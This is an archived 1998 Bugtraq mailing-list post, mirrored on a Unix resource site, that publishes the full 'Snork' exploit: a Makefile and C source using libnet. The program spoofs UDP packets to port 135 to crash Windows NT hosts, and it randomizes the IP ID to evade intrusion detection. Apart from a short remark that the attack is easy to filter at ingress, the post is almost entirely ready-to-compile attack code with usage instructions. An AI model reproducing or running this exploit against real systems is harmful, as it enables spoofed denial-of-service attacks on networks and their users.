The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Совет: Включение Hyper-Threading scheduler в Linux, для CPU Xeon.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Snork exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 29 Sep 1998 15:36:27 -0700
From: route@RESENTMENT.INFONEXUS.COM
To: BUGTRAQ@netspace.org
Subject: Snork exploit

    Snork exploit code as per the ISS X-force advisory.  Needs libnet.
    http://www.infonexus.com/~daemon9/Libnet.  This exploit painfully
    easy to prevent at the point of ingress.  Let's hop to it, huh?
    You can extract the Makefile and C code via the Phrack Magazine
    extraction utility, or just manually seperate the files.


<++> Snork/Makefile
#   route|daemon9 <route@infonexus.com>


CFLAGS      =   -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 -Wall
OBJECTS     =   snork.o
LIBS        =   -lnet

.c.o:
        $(CC) $(CFLAGS) $(DEFINES) -c $< -o $@

all: snork

snork: $(OBJECTS)
        $(CC) snork.o $(LIBS) -o ./snork

dist:   clean
        @(cd ..; rm snork.tgz; tar cvzf snork.tgz Snork/)

clean:
        rm -f core snork *.o

# EOF
<-->
<++> Snork/snork.c
/*
 *  $Id: snork.c,v 1.1 1998/09/29 05:20:15 root Exp root $
 *
 *  snork.c - Windows NT UDP killer
 *
 *  Written as per the ISS X force advisory.
 *
 *  Building:
 *
 *  This compiles under: OpenBSD, FreeBSD, Linux, Solaris and possibly others.
 *  (Solaris port remains broken until libnet gets fixed for solaris checksums).
 *  You need libnet to compile this exploit.  It's all very simple:
 *  1) get the library from http://www.infonexus.com/~daemon9/Libnet
 *  2) build the library.
 *  3) install the library.
 *  4) compile this exploit.
 *
 *  Usage:
 *
 *  ./snork target
 *      Spoofs packets from target to target.
 *
 *  ./snork source target
 *      Spoofs packets from source to target.
 *
 *  route|daemon9 <route@infonexus.com>
 *
 */

#include <libnet.h>
#include <string.h>

#define SENDAMT     10
#define SPORT       135
#define DPORT       135

int
main(int argc, char **argv)
{
    int sock, c, i, payload_s;
    u_char *buf, *payload;
    u_long ip_src, ip_dst;

    if (argc > 3 || argc < 2)
    {
        fprintf(stderr, "No retard.\nUsage:\tsnork [source] target\n");
        exit(EXIT_FAILURE);
    }
    if ((ip_src = name_resolve(argv[1], 1)) == -1)
    {
        fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]);
        exit(EXIT_FAILURE);
    }
    if (argc == 3)
    {
        if ((ip_dst = name_resolve(argv[2], 1)) == -1)
        {
            fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]);
            exit(EXIT_FAILURE);
        }
    }
    else
    {
        ip_dst = ip_src;
    }

    printf("Hi.  Read Phrack.  Thanks.\n");

    if ((payload = getenv("HOST")) == NULL)
    {
        payload = "i am lame dos kid but i read phrack so it's ok";
    }
    payload_s = strlen(payload);

    buf = malloc(UDP_H + IP_H + payload_s);
    if (!buf)
    {
        perror("No memory for packet header");
        exit(1);
    }

    /*
     *  Don't use raw sockets.  They suck.
     */
    sock = open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(1);
    }

    /*
     *  We will randomize the ip_id for good measure.  I've seen crappy NIDS
     *  code that looks for exploits like this by fixing in on static header
     *  fields.
     */
    seed_prand();

    for (i = 0; i < SENDAMT; i++)
    {
        /*
         *  Build the IP header.
         */
        build_ip(UDP_H + payload_s,     /* total payload size */
                get_prand(PRu16),       /* IP ID */
                0,                      /* fragmentation bits */
                64,                     /* IP TTL */
                IPPROTO_UDP,            /* transport protocol */
                ip_src,                 /* source IP */
                ip_dst,                 /* destination IP */
                NULL,                   /* payload pointer */
                0,                      /* payload size */
                buf);                   /* packet header memory */

        /*
         *  Build the UDP header.
         */
        build_udp(SPORT, DPORT, payload, payload_s, buf + IP_H);

        /*
         *  UDP checksum (IP check is done by mr kernel, as always).
         */
        do_checksum(buf, IPPROTO_UDP, UDP_H + payload_s);

        /*
         *  Write the packet to the network.
         */
        c = write_ip(sock, buf, UDP_H + IP_H + payload_s);
        if (c < UDP_H + IP_H + payload_s)
        {
            fprintf(stderr, "write_ip: only wrote %d bytes\n", c);
        }
        fprintf(stderr, ".");               /* no buffering, please */
    }
    printf("\nsnork snork\n");
    free(buf);
    exit (EXIT_SUCCESS);
}
/* EOF */
<-->

--
I live a world of paradox... My willingness to destroy is your chance for
improvement, my hate is your fate -- my failure is your victory, a victory
that won't last.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList